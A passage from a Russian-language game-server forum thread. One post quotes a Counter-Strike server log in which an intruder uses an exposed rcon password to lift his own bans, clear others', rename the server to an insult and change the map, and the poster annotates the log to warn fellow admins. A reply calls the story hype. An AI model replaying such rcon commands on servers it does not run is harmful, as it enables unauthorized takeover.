LSW 07/12/2013 - 14:48:45: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:45: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:45: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:45: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:48:51: [DPROTO]: TryAuthRevEmu: AuthString = 'WDWX90A89R1870'
LSW 07/12/2013 - 14:48:51: [DPROTO]: Client 1 - Set AuthIdType 1 [dp_RevEmu]; pClient = 058A64A8
LSW 07/12/2013 - 14:48:51: "XyiGolova<3><STEAM_0:0:1522407310><>" connected, address "178.137.71.210:27005"
LSW 07/12/2013 - 14:48:52: Kick: "XyiGolova<3><STEAM_0:0:1522407310><>" was kicked by "Console" (message ""You are banned from this server. Check your console"")
LSW 07/12/2013 - 14:49:06: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:06: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:09: Rcon: "rcon 20220000 "dyra" removeid " from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:09: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:09: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:13: Rcon: "rcon 20220000 "dyra" removeid 1522407310" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:13: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:13: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:15: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:15: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:25: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:25: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:26: Team "CT" triggered "Target_Saved" (CT "3") (T "0")
LSW 07/12/2013 - 14:49:26: World triggered "Round_End"
LSW 07/12/2013 - 14:49:26: Rcon: "rcon 20220000 "dyra" removeid 1522407310" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:27: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:27: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:29: Rcon: "rcon 20220000 "dyra" removeid 1522407310" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:29: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:29: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:49:31: World triggered "Round_Start"
LSW 07/12/2013 - 14:49:37: [DPROTO]: TryAuthRevEmu: AuthString = 'WDWX90A89R1870'
LSW 07/12/2013 - 14:49:37: [DPROTO]: Client 1 - Set AuthIdType 1 [dp_RevEmu]; pClient = 058A64A8
LSW 07/12/2013 - 14:49:37: "XyiGolova<4><STEAM_0:0:1522407310><>" connected, address "178.137.71.210:27005"
LSW 07/12/2013 - 14:49:38: Kick: "XyiGolova<4><STEAM_0:0:1522407310><>" was kicked by "Console" (message ""You are banned from this server. Check your console"")
LSW 07/12/2013 - 14:49:54: [DPROTO]: TryAuthRevEmu: AuthString = 'WDWX90A89R1870'
LSW 07/12/2013 - 14:49:54: [DPROTO]: Client 1 - Set AuthIdType 1 [dp_RevEmu]; pClient = 058A64A8
LSW 07/12/2013 - 14:49:54: "XyiGolova<5><STEAM_0:0:1522407310><>" connected, address "178.137.71.210:27005"
LSW 07/12/2013 - 14:49:56: Kick: "XyiGolova<5><STEAM_0:0:1522407310><>" was kicked by "Console" (message ""You are banned from this server. Check your console"")
LSW 07/12/2013 - 14:50:15: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:16: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:16: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:19: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:19: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:19: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:22: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:23: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:23: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:25: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:26: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:26: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:29: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:30: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:30: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:31: Rcon: "rcon 20220000 "dyra" exec banned.cfg" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:31: Rcon: "rcon 20220000 "dyra" exec listip.cfg" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:31: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:31: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:34: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:34: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:34: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:36: Rcon: "rcon 20220000 "dyra" removeip 178.137.71.210" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:36: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:36: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" removeip 188.187.145.52" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" removeip 188.115.143.31" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" removeip 178.236.140.18" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" removeip 128.70.157.157" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" removeip 80.241.251.66" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" removeip 5.138.4.235" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" listid" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:42: Rcon: "rcon 20220000 "dyra" listip" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:50:54: Rcon: "rcon 20220000 "dyra" hostname "ADMIN SYKA IA POLOMAL TVOI SERVAK"" from "178.137.71.210:7130"
LSW 07/12/2013 - 14:51:04: [DPROTO]: TryAuthRevEmu: AuthString = 'WDWX90A89R1870'
LSW 07/12/2013 - 14:51:04: [DPROTO]: Client 1 - Set AuthIdType 1 [dp_RevEmu]; pClient = 058A64A8
LSW 07/12/2013 - 14:51:04: "XyiGolova<6><STEAM_0:0:1522407310><>" connected, address "178.137.71.210:27005"
LSW 07/12/2013 - 14:51:06: Kick: "XyiGolova<6><STEAM_0:0:1522407310><>" was kicked by "Console" (message ""You are banned from this server. Check your console"")
LSW 07/12/2013 - 14:51:12: Rcon: "rcon 20220000 "dyra" maps *" from "178.137.71.210:7130" <----------------------------------------------------------СМОТРИМ ВОТ СЮДА ОСОБО!!!!
LSW 07/12/2013 - 14:51:23: Rcon: "rcon 20220000 "dyra" changelevel de_dust2_2x2" from "178.137.71.210:7130" <-----------------------------------ТЕПЕРЬ ПЕРЕЗАГРУЗКА И ВУАЛЯ!!!
Правда очень интересно, если бы было больше нечем заниматься?
Поверьте мне, забанив даже 2 таких придурков вы надолго избавитесь от подобных головняков.

Отредактировал: tonline_kms65, - 20.7.2013, 9:11


http://kmscs.esy.es/www/new5.php
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя tonline_kms65
сообщение 20.7.2013, 9:39
Сообщение #420


Стаж: 18 лет

Сообщений: 42
Благодарностей: 30
Полезность: 244

Цитата(IM_RAM @ 20.7.2013, 5:43) *


Честно - х...ня все это.
Поцику наверно просто загнали предварительно вируса. Развели просто, он в панику, а народ готов поверить во все что только можно.
Я тоже немного в душе романтик. Хочется иногда поверить что есть все-таки в мире супер-пупер программа с которой мы запросто сломаем сервак например FBI.
Но вот в реальности все это ***. Хотелось бы хоть примерно понять. каким это интересно образом задается этим софтом определенный STEAM?
У меня нет слов одни маты.
Беспонтовая тема, рассчитано на бла, бла, бла, что бы не забыли главное про автора. А может быть это депутат нашей государственной думы? clapping.gif


http://kmscs.esy.es/www/new5.php
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
23 страниц V  « 20 21 22 »
 
Ответить в данную темуНачать новую тему
 
0 пользователей и 2 гостей читают эту тему: